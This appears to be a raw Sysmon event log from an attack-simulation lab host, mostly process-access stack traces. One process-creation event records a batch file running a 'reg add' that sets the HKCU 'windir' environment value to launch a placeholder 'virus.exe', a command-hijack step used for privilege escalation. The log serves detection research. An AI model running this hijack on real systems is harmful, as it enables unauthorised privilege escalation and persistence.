10341000x80000000000000001050941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.181{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.181{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.181{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DD-60EB-777D-00000000CF01}8868C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.181{466BC892-F5DC-60EB-747D-00000000CF01}43042332C:\Windows\system32\cmd.exe{466BC892-F5DD-60EB-777D-00000000CF01}8868C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.195{466BC892-F5DD-60EB-777D-00000000CF01}8868C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Environment" /v "windir" /d "cmd /c start C:\temp\test\virus.exe&REM " C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 10341000x80000000000000001050936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.150{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5DD-60EB-767D-00000000CF01}9260C:\Windows\system32\mode.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.150{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.150{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.150{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.134{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.134{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5DD-60EB-767D-00000000CF01}9260C:\Windows\system32\mode.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.134{466BC892-F5DC-60EB-747D-00000000CF01}43042332C:\Windows\system32\cmd.exe{466BC892-F5DD-60EB-767D-00000000CF01}9260C:\Windows\system32\mode.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.148{466BC892-F5DD-60EB-767D-00000000CF01}9260C:\Windows\System32\mode.com10.0.14393.0 (rs1_release.160715-1616)DOS Device MODE UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationMODE.COMmode 18,1C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=614F8D56EE8470746B6F68CEA0C2A838,SHA256=95696BF3D50A47A840D8CED5CD0E88677372411E9AB698B644244051B69C6E6A,IMPHASH=FD0E8966C3BCFE9DE1C17814481140CD{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 10341000x80000000000000001050928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.112{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.112{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.112{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.112{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.112{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.096{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.081{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.049{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.049{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.049{466BC892-F5DD-60EB-757D-00000000CF01}969210124C:\Windows\system32\conhost.exe{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.033{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5DD-60EB-757D-00000000CF01}9692C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:17.012{466BC892-02AF-60E8-1400-00000000CF01}10285432C:\Windows\System32\svchost.exe{466BC892-F5DC-60EB-747D-00000000CF01}4304C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:17.012{466BC892-02AF-60E8-1400-00000000CF01}10285432C:\Windows\System32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 